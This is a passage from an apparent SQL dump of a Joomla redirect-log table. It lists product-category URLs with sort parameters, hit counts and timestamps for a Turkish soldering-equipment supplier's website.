00:00:00',301),(16698,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,`p`.product_sku/dirdesc/results,1-100',NULL,'','',2,0,'2017-12-27 00:16:00','0000-00-00 00:00:00',301),(16699,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/temizleme-makineleri/by,category_name/results,1-20',NULL,'','',6,0,'2017-12-27 00:47:17','0000-00-00 00:00:00',301),(16700,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,pc.ordering,product_name/dirdesc/results,1-40',NULL,'','',1,0,'2017-12-27 01:42:04','0000-00-00 00:00:00',301),(16701,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/temizleme-makineleri/by,category_name/results,1-50',NULL,'','',1,0,'2017-12-27 01:49:53','0000-00-00 00:00:00',301),(16702,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-ultra-hız/by,pc.ordering,product_name/results,1-50',NULL,'','',1,0,'2017-12-27 02:05:32','0000-00-00 00:00:00',301),(16703,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/konveyorler/by,mf_name/results,1-50',NULL,'','',1,0,'2017-12-27 02:36:50','0000-00-00 00:00:00',301),(16704,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,pc.ordering,product_name/dirdesc/results,1-10',NULL,'','',1,0,'2017-12-27 03:08:09','0000-00-00 00:00:00',301),(16705,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/temizleme-makineleri/by,`p`.product_sku/results,1-50',NULL,'','',1,0,'2017-12-27 03:15:58','0000-00-00 00:00:00',301),(16706,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/konveyorler/by,product_name/dirdesc',NULL,'','',2,0,'2017-12-27 03:40:56','0000-00-00 00:00:00',301),(16707,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-ultra-hız/by,pc.ordering,product_name/results,1-20',NULL,'','',2,0,'2017-12-27 04:06:39','0000-00-00 00:00:00',301),(16708,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/konveyorler/by,ordering/results,1-5',NULL,'','',4,0,'2017-12-27 05:40:56','0000-00-00 00:00:00',301),(16709,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/dalga-lehim/by,ordering',NULL,'','',3,0,'2017-12-27 07:40:55','0000-00-00 00:00:00',301),(16710,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/konveyorler/by,mf_name/results,1-10',NULL,'','',3,0,'2017-12-27 08:15:12','0000-00-00 00:00:00',301),(16711,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/by,`p`.product_sku',NULL,'','',77,0,'2017-12-27 10:09:27','0000-00-00 00:00:00',301),(16712,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/by,`p`.product_sku/dirdesc',NULL,'','',78,0,'2017-12-27 10:09:35','0000-00-00 00:00:00',301),(16713,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/by,category_name',NULL,'','',79,0,'2017-12-27 10:10:03','0000-00-00 00:00:00',301),(16714,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/by,category_name/dirdesc',NULL,'','',81,0,'2017-12-27 10:10:10','0000-00-00 00:00:00',301),(16715,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/by,mf_name',NULL,'','',78,0,'2017-12-27 10:10:40','0000-00-00 00:00:00',301),(16716,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/by,mf_name/dirdesc',NULL,'','',78,0,'2017-12-27 10:10:47','0000-00-00 00:00:00',301),(16717,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/by,ordering',NULL,'','',78,0,'2017-12-27 10:11:11','0000-00-00 00:00:00',301),(16718,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/by,product_name/dirdesc',NULL,'','',254,0,'2017-12-27 10:11:17','0000-00-00 00:00:00',301),(16719,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/by,product_name',NULL,'','',76,0,'2017-12-27 10:11:24','0000-00-00 00:00:00',301),(16720,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/by,product_sku',NULL,'','',251,0,'2017-12-27 10:11:26','0000-00-00 00:00:00',301),(16721,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/by,product_name/dirdesc',NULL,'','',74,0,'2017-12-27 10:11:30','0000-00-00 00:00:00',301),(16722,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/dirdesc',NULL,'','',257,0,'2017-12-27 10:11:32','0000-00-00 00:00:00',301),(16723,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın/by,`p`.product_sku',NULL,'','',265,0,'2017-12-27 10:11:47','0000-00-00 00:00:00',301),(16724,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/by,product_sku',NULL,'','',79,0,'2017-12-27 10:11:47','0000-00-00 00:00:00',301),(16725,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın/by,`p`.product_sku/dirdesc',NULL,'','',263,0,'2017-12-27 10:11:50','0000-00-00 00:00:00',301),(16726,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/dirdesc',NULL,'','',81,0,'2017-12-27 10:11:57','0000-00-00 00:00:00',301),(16727,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın/by,category_name',NULL,'','',266,0,'2017-12-27 10:12:00','0000-00-00 00:00:00',301),(16728,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın/by,category_name/dirdesc',NULL,'','',257,0,'2017-12-27 10:12:03','0000-00-00 00:00:00',301),(16729,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın/by,mf_name',NULL,'','',261,0,'2017-12-27 10:12:16','0000-00-00 00:00:00',301),(16730,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın/by,mf_name/dirdesc',NULL,'','',261,0,'2017-12-27 10:12:22','0000-00-00 00:00:00',301),(16731,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın/by,`p`.product_sku/dirdesc',NULL,'','',81,0,'2017-12-27 10:12:27','0000-00-00 00:00:00',301),(16732,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın/by,ordering',NULL,'','',267,0,'2017-12-27 10:12:32','0000-00-00 00:00:00',301),(16733,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın/by,product_name',NULL,'','',266,0,'2017-12-27 10:12:43','0000-00-00 00:00:00',301),(16734,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın/by,category_name',NULL,'','',85,0,'2017-12-27 10:12:47','0000-00-00 00:00:00',301),(16735,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın/by,product_name/dirdesc',NULL,'','',277,0,'2017-12-27 10:12:47','0000-00-00 00:00:00',301),(16736,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın/by,category_name/dirdesc',NULL,'','',86,0,'2017-12-27 10:12:54','0000-00-00 00:00:00',301),(16737,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın/by,product_sku',NULL,'','',270,0,'2017-12-27 10:12:57','0000-00-00 00:00:00',301),(16738,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın/dirdesc',NULL,'','',275,0,'2017-12-27 10:13:02','0000-00-00 00:00:00',301),(16739,'http://3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/by,`p`.product_sku',NULL,'','',279,0,'2017-12-27 10:13:13','0000-00-00 00:00:00',301),(16740,'http://3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/by,`p`.product_sku/dirdesc',NULL,'','',271,0,'2017-12-27 10:13:17','0000-00-00 00:00:00',301),(16741,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın/by,mf_name',NULL,'','',83,0,'2017-12-27 10:13:24','0000-00-00 00:00:00',301),(16742,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın/by,mf_name/dirdesc',NULL,'','',84,0,'2017-12-27 10:13:29','0000-00-00 00:00:00',301),(16743,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın/by,ordering',NULL,'','',84,0,'2017-12-27 10:13:58','0000-00-00 00:00:00',301),(16744,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın/by,product_name',NULL,'','',84,0,'2017-12-27 10:14:15','0000-00-00 00:00:00',301),(16745,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın/by,product_name/dirdesc',NULL,'','',83,0,'2017-12-27 10:14:22','0000-00-00 00:00:00',301),(16746,'http://3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/dirdesc',NULL,'','',292,0,'2017-12-27 10:14:24','0000-00-00 00:00:00',301),(16747,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın/by,product_sku',NULL,'','',83,0,'2017-12-27 10:14:48','0000-00-00 00:00:00',301),(16748,'http://3s-technologies.com.tr/index.php/en/products/smd-fırın/by,`p`.product_sku',NULL,'','',300,0,'2017-12-27 10:14:50','0000-00-00 00:00:00',301),(16749,'http://3s-technologies.com.tr/index.php/en/products/smd-fırın/by,`p`.product_sku/dirdesc',NULL,'','',299,0,'2017-12-27 10:14:54','0000-00-00 00:00:00',301),(16750,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın/dirdesc',NULL,'','',82,0,'2017-12-27 10:15:06','0000-00-00 00:00:00',301),(16751,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/dalga-lehim/by,pc.ordering,product_name',NULL,'','',1,0,'2017-12-27 10:15:12','0000-00-00 00:00:00',301),(16752,'http://3s-technologies.com.tr/index.php/en/products/smd-fırın/by,ordering',NULL,'','',318,0,'2017-12-27 10:15:25','0000-00-00 00:00:00',301),(16753,'http://3s-technologies.com.tr/index.php/en/products/smd-fırın/by,product_name',NULL,'','',320,0,'2017-12-27 10:15:33','0000-00-00 00:00:00',301),(16754,'http://3s-technologies.com.tr/index.php/en/products/smd-fırın/by,product_name/dirdesc',NULL,'','',323,0,'2017-12-27 10:15:38','0000-00-00 00:00:00',301),(16755,'http://www.3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/by,`p`.product_sku',NULL,'','',80,0,'2017-12-27 10:15:46','0000-00-00 00:00:00',301),(16756,'http://3s-technologies.com.tr/index.php/en/products/smd-fırın/by,product_sku',NULL,'','',325,0,'2017-12-27 10:15:50','0000-00-00 00:00:00',301),(16757,'http://3s-technologies.com.tr/index.php/en/products/smd-fırın/dirdesc',NULL,'','',327,0,'2017-12-27 10:15:55','0000-00-00 00:00:00',301),(16758,'http://www.3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/by,`p`.product_sku/dirdesc',NULL,'','',79,0,'2017-12-27 10:15:58','0000-00-00 00:00:00',301),(16759,'http://3s-technologies.com.tr/en/products/bölgesel-lehimleme/by,`p`.product_sku',NULL,'','',506,0,'2017-12-27 10:16:10','0000-00-00 00:00:00',301),(16760,'http://3s-technologies.com.tr/en/products/bölgesel-lehimleme/by,`p`.product_sku/dirdesc',NULL,'','',406,0,'2017-12-27 10:16:12','0000-00-00 00:00:00',301),(16761,'http://www.3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/by,category_name',NULL,'','',81,0,'2017-12-27 10:16:26','0000-00-00 00:00:00',301),(16762,'http://3s-technologies.com.tr/en/products/bölgesel-lehimleme/by,category_name/dirdesc',NULL,'','',388,0,'2017-12-27 10:16:29','0000-00-00 00:00:00',301),(16763,'http://www.3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/by,category_name/dirdesc',NULL,'','',81,0,'2017-12-27 10:16:32','0000-00-00 00:00:00',301),(16764,'http://3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/by,`p`.product_sku',NULL,'','',329,0,'2017-12-27 10:16:32','0000-00-00 00:00:00',301),(16765,'http://3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/by,`p`.product_sku/dirdesc',NULL,'','',330,0,'2017-12-27 10:16:35','0000-00-00 00:00:00',301),(16766,'http://3s-technologies.com.tr/en/products/bölgesel-lehimleme/by,mf_name/dirdesc',NULL,'','',384,0,'2017-12-27 10:16:37','0000-00-00 00:00:00',301),(16767,'http://3s-technologies.com.tr/en/products/bölgesel-lehimleme/by,ordering',NULL,'','',382,0,'2017-12-27 10:16:44','0000-00-00 00:00:00',301),(16768,'http://3s-technologies.com.tr/en/products/bölgesel-lehimleme/by,pc.ordering,product_name',NULL,'','',395,0,'2017-12-27 10:16:49','0000-00-00 00:00:00',301),(16769,'http://3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/by,category_name',NULL,'','',326,0,'2017-12-27 10:16:51','0000-00-00 00:00:00',301),(16770,'http://3s-technologies.com.tr/en/products/bölgesel-lehimleme/by,pc.ordering,product_name/dirdesc',NULL,'','',392,0,'2017-12-27 10:16:51','0000-00-00 00:00:00',301),(16771,'http://3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/by,category_name/dirdesc',NULL,'','',321,0,'2017-12-27 10:16:54','0000-00-00 00:00:00',301),(16772,'http://www.3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/by,mf_name',NULL,'','',80,0,'2017-12-27 10:17:03','0000-00-00 00:00:00',301),(16773,'http://3s-technologies.com.tr/en/products/bölgesel-lehimleme/by,product_name/dirdesc',NULL,'','',380,0,'2017-12-27 10:17:04','0000-00-00 00:00:00',301),(16774,'http://www.3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/by,mf_name/dirdesc',NULL,'','',77,0,'2017-12-27 10:17:10','0000-00-00 00:00:00',301),(16775,'http://3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/by,product_name/dirdesc',NULL,'','',325,0,'2017-12-27 10:17:27','0000-00-00 00:00:00',301),(16776,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/ã§ubuk-lehim',NULL,'','',199,0,'2017-12-27 10:17:29','0000-00-00 00:00:00',301),(16777,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/çubuk-lehim/by,`p`.product_sku',NULL,'','',396,0,'2017-12-27 10:17:35','0000-00-00 00:00:00',301),(16778,'http://www.3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/by,ordering',NULL,'','',77,0,'2017-12-27 10:17:35','0000-00-00 00:00:00',301),(16779,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/çubuk-lehim/by,`p`.product_sku/dirdesc',NULL,'','',406,0,'2017-12-27 10:17:37','0000-00-00 00:00:00',301),(16780,'http://3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/by,product_sku',NULL,'','',329,0,'2017-12-27 10:17:40','0000-00-00 00:00:00',301),(16781,'http://3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/dirdesc',NULL,'','',337,0,'2017-12-27 10:17:45','0000-00-00 00:00:00',301),(16782,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/çubuk-lehim/by,category_name/dirdesc',NULL,'','',411,0,'2017-12-27 10:17:45','0000-00-00 00:00:00',301),(16783,'http://www.3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/by,product_name',NULL,'','',80,0,'2017-12-27 10:17:53','0000-00-00 00:00:00',301),(16784,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/çubuk-lehim/by,mf_name/dirdesc',NULL,'','',418,0,'2017-12-27 10:17:55','0000-00-00 00:00:00',301),(16785,'http://www.3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/by,product_name/dirdesc',NULL,'','',78,0,'2017-12-27 10:18:02','0000-00-00 00:00:00',301),(16786,'http://3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/by,`p`.product_sku',NULL,'','',337,0,'2017-12-27 10:18:04','0000-00-00 00:00:00',301),(16787,'http://3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/by,`p`.product_sku/dirdesc',NULL,'','',348,0,'2017-12-27 10:18:08','0000-00-00 00:00:00',301),(16788,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/çubuk-lehim/by,ordering',NULL,'','',407,0,'2017-12-27 10:18:12','0000-00-00 00:00:00',301),(16789,'http://3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/by,category_name',NULL,'','',339,0,'2017-12-27 10:18:18','0000-00-00 00:00:00',301),(16790,'http://3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/by,category_name/dirdesc',NULL,'','',348,0,'2017-12-27 10:18:24','0000-00-00 00:00:00',301),(16791,'http://www.3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/by,product_sku',NULL,'','',79,0,'2017-12-27 10:18:29','0000-00-00 00:00:00',301),(16792,'http://3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/by,mf_name',NULL,'','',345,0,'2017-12-27 10:18:41','0000-00-00 00:00:00',301),(16793,'http://3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/by,mf_name/dirdesc',NULL,'','',350,0,'2017-12-27 10:18:45','0000-00-00 00:00:00',301),(16794,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/çubuk-lehim/by,pc.ordering,product_name',NULL,'','',400,0,'2017-12-27 10:18:50','0000-00-00 00:00:00',301),(16795,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/çubuk-lehim/by,pc.ordering,product_name/dirdesc',NULL,'','',412,0,'2017-12-27 10:18:59','0000-00-00 00:00:00',301),(16796,'http://www.3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/dirdesc',NULL,'','',80,0,'2017-12-27 10:19:03','0000-00-00 00:00:00',301),(16797,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/çubuk-lehim/by,product_name/dirdesc',NULL,'','',398,0,'2017-12-27 10:19:38','0000-00-00 00:00:00',301),(16798,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-fırın/by,`p`.product_sku',NULL,'','',375,0,'2017-12-27 10:19:58','0000-00-00 00:00:00',301),(16799,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-fırın/by,`p`.product_sku/dirdesc',NULL,'','',372,0,'2017-12-27 10:20:00','0000-00-00 00:00:00',301),(16800,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/by,`p`.product_sku',NULL,'','',77,0,'2017-12-27 10:20:07','0000-00-00 00:00:00',301),(16801,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-fırın/by,category_name/dirdesc',NULL,'','',388,0,'2017-12-27 10:20:09','0000-00-00 00:00:00',301),(16802,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/by,`p`.product_sku/dirdesc',NULL,'','',75,0,'2017-12-27 10:20:14','0000-00-00 00:00:00',301),(16803,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-fırın/by,mf_name/dirdesc',NULL,'','',383,0,'2017-12-27 10:20:19','0000-00-00 00:00:00',301),(16804,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-fırın/by,ordering',NULL,'','',369,0,'2017-12-27 10:20:25','0000-00-00 00:00:00',301),(16805,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-fırın/by,pc.ordering,product_name',NULL,'','',368,0,'2017-12-27 10:20:28','0000-00-00 00:00:00',301),(16806,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-fırın/by,pc.ordering,product_name/dirdesc',NULL,'','',366,0,'2017-12-27 10:20:31','0000-00-00 00:00:00',301),(16807,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-fırın/by,product_name/dirdesc',NULL,'','',389,0,'2017-12-27 10:20:40','0000-00-00 00:00:00',301),(16808,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/by,category_name',NULL,'','',81,0,'2017-12-27 10:20:42','0000-00-00 00:00:00',301),(16809,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/by,category_name/dirdesc',NULL,'','',80,0,'2017-12-27 10:20:55','0000-00-00 00:00:00',301),(16810,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-hızlı/by,`p`.product_sku',NULL,'','',407,0,'2017-12-27 10:21:00','0000-00-00 00:00:00',301),(16811,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-hızlı/by,`p`.product_sku/dirdesc',NULL,'','',411,0,'2017-12-27 10:21:02','0000-00-00 00:00:00',301),(16812,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-hızlı/by,category_name/dirdesc',NULL,'','',409,0,'2017-12-27 10:21:12','0000-00-00 00:00:00',301),(16813,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/by,mf_name',NULL,'','',80,0,'2017-12-27 10:21:22','0000-00-00 00:00:00',301),(16814,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-hızlı/by,mf_name/dirdesc',NULL,'','',392,0,'2017-12-27 10:21:23','0000-00-00 00:00:00',301),(16815,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/by,mf_name/dirdesc',NULL,'','',78,0,'2017-12-27 10:21:29','0000-00-00 00:00:00',301),(16816,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-hızlı/by,ordering',NULL,'','',391,0,'2017-12-27 10:21:30','0000-00-00 00:00:00',301),(16817,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-hızlı/by,pc.ordering,product_name',NULL,'','',400,0,'2017-12-27 10:21:34','0000-00-00 00:00:00',301),(16818,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-hızlı/by,pc.ordering,product_name/dirdesc',NULL,'','',391,0,'2017-12-27 10:21:36','0000-00-00 00:00:00',301),(16819,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-hızlı/by,product_name/dirdesc',NULL,'','',408,0,'2017-12-27 10:21:47','0000-00-00 00:00:00',301),(16820,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/by,ordering',NULL,'','',74,0,'2017-12-27 10:21:56','0000-00-00 00:00:00',301),(16821,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/by,product_name',NULL,'','',76,0,'2017-12-27 10:22:06','0000-00-00 00:00:00',301),(16822,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-hız/by,`p`.product_sku',NULL,'','',401,0,'2017-12-27 10:22:06','0000-00-00 00:00:00',301),(16823,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-hız/by,`p`.product_sku/dirdesc',NULL,'','',394,0,'2017-12-27 10:22:09','0000-00-00 00:00:00',301),(16824,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/by,product_name/dirdesc',NULL,'','',77,0,'2017-12-27 10:22:17','0000-00-00 00:00:00',301),(16825,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-hız/by,category_name/dirdesc',NULL,'','',400,0,'2017-12-27 10:22:18','0000-00-00 00:00:00',301),(16826,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-hız/by,mf_name/dirdesc',NULL,'','',397,0,'2017-12-27 10:22:26','0000-00-00 00:00:00',301),(16827,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-hız/by,ordering',NULL,'','',401,0,'2017-12-27 10:22:31','0000-00-00 00:00:00',301),(16828,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-hız/by,pc.ordering,product_name',NULL,'','',392,0,'2017-12-27 10:22:37','0000-00-00 00:00:00',301),(16829,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-hız/by,pc.ordering,product_name/dirdesc',NULL,'','',399,0,'2017-12-27 10:22:39','0000-00-00 00:00:00',301),(16830,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/by,product_sku',NULL,'','',78,0,'2017-12-27 10:22:48','0000-00-00 00:00:00',301),(16831,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-hız/by,product_name/dirdesc',NULL,'','',388,0,'2017-12-27 10:22:48','0000-00-00 00:00:00',301),(16832,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-hızlı/by,`p`.product_sku',NULL,'','',385,0,'2017-12-27 10:23:08','0000-00-00 00:00:00',301),(16833,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-hızlı/by,`p`.product_sku/dirdesc',NULL,'','',387,0,'2017-12-27 10:23:11','0000-00-00 00:00:00',301),(16834,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız/by,mf_name/dirdesc',NULL,'','',75,0,'2017-12-27 10:23:19','0000-00-00 00:00:00',301),(16835,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-hızlı/by,category_name/dirdesc',NULL,'','',388,0,'2017-12-27 10:23:19','0000-00-00 00:00:00',301),(16836,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-hızlı/by,mf_name/dirdesc',NULL,'','',391,0,'2017-12-27 10:23:29','0000-00-00 00:00:00',301),(16837,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-hızlı/by,ordering',NULL,'','',387,0,'2017-12-27 10:23:38','0000-00-00 00:00:00',301),(16838,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-hızlı/by,pc.ordering,product_name',NULL,'','',384,0,'2017-12-27 10:23:42','0000-00-00 00:00:00',301),(16839,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-hızlı/by,pc.ordering,product_name/dirdesc',NULL,'','',380,0,'2017-12-27 10:23:44','0000-00-00 00:00:00',301),(16840,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız/by,ordering',NULL,'','',73,0,'2017-12-27 10:23:46','0000-00-00 00:00:00',301),(16841,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-hızlı/by,product_name/dirdesc',NULL,'','',376,0,'2017-12-27 10:23:54','0000-00-00 00:00:00',301),(16842,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız/by,product_name',NULL,'','',73,0,'2017-12-27 10:24:05','0000-00-00 00:00:00',301),(16843,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız/by,product_name/dirdesc',NULL,'','',73,0,'2017-12-27 10:24:09','0000-00-00 00:00:00',301),(16844,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-hız/by,`p`.product_sku',NULL,'','',387,0,'2017-12-27 10:24:13','0000-00-00 00:00:00',301),(16845,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-hız/by,`p`.product_sku/dirdesc',NULL,'','',382,0,'2017-12-27 10:24:15','0000-00-00 00:00:00',301),(16846,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-hız/by,category_name/dirdesc',NULL,'','',395,0,'2017-12-27 10:24:25','0000-00-00 00:00:00',301),(16847,'http://3s-technologies.com.tr/en/products/smd-düşük-hızlı/by,`p`.product_sku',NULL,'','',397,0,'2017-12-27 10:24:32','0000-00-00 00:00:00',301),(16848,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-hız/by,mf_name/dirdesc',NULL,'','',397,0,'2017-12-27 10:24:35','0000-00-00 00:00:00',301),(16849,'http://3s-technologies.com.tr/en/products/smd-düşük-hızlı/by,`p`.product_sku/dirdesc',NULL,'','',392,0,'2017-12-27 10:24:36','0000-00-00 00:00:00',301),(16850,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-hız/by,ordering',NULL,'','',408,0,'2017-12-27 10:24:42','0000-00-00 00:00:00',301),(16851,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız/by,product_sku',NULL,'','',74,0,'2017-12-27 10:24:44','0000-00-00 00:00:00',301),(16852,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-hız/by,pc.ordering,product_name',NULL,'','',415,0,'2017-12-27 10:24:46','0000-00-00 00:00:00',301),(16853,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-hız/by,pc.ordering,product_name/dirdesc',NULL,'','',410,0,'2017-12-27 10:24:49','0000-00-00 00:00:00',301),(16854,'http://3s-technologies.com.tr/en/products/smd-düşük-hızlı/by,category_name/dirdesc',NULL,'','',402,0,'2017-12-27 